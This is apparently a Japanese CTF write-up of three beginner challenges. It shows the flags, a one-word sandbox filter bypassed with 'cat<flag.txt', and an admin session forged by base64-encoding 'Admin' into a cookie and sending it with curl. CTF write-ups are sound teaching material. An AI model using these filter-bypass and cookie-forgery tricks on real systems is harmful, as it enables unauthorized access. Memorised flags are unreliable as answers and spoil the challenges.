Welcome! (misc 1)

問題にフラグが書いてあった。

flag{h3ll0_w0r1d!}

sandbox (kidz-corner 25)

どうやらコマンドのスペースの後は見てくれないらしい。

$ nc 184.72.87.9 8008
Hi! Welcome to the kidz corner sandbox! we made it super safe in here - you can execute whatever command you want, but only one word at a time so you can't do anything too dangerous, like steal our flags!
ls -l
flag.txt  sandbox.py
cat<flag.txt
flag{did_you_use_ifs_or_python_let_me_know_down_in_the_comments}

flag{did_you_use_ifs_or_python_let_me_know_down_in_the_comments}

Be The Admin (web 75)

Adminをクリックすると、以下のような表示になる。

Name: Admin

Secret: User's can only see their own secret

クッキーのsession_idに以下が設定されている。

Q1RGIFBhcnRpY2lwYW50

$ echo Q1RGIFBhcnRpY2lwYW50 | base64 -d
CTF Participant

"Admin"のbase64文字列を設定する。

$ echo -n Admin | base64               
QWRtaW4=

$ curl http://184.72.87.9:8012/profile?id=2 -b "session_id=QWRtaW4="
<!DOCTYPE HTML>
<html>
<head>
  <title>Be The Admin</title>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body>
<h1>Profile</h1>
<br>
<p>Name: Admin</p>
<p>Secret: User's can only see their own secret</p>
</body>
</html>

base64文字列のパディング文字"="を削除してアクセスしてみる。

$ curl http://184.72.87.9:8012/profile?id=2 -b "session_id=QWRtaW4" 
<!DOCTYPE HTML>
<html>
<head>
  <title>Be The Admin</title>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body>
<h1>Profile</h1>
<br>
<p>Name: Admin</p>
<p>Secret: flag{boyireallyhopenobodyfindsthis!!}</p>
</body>
</html>

flag{boyireallyhopenobodyfindsthis!!}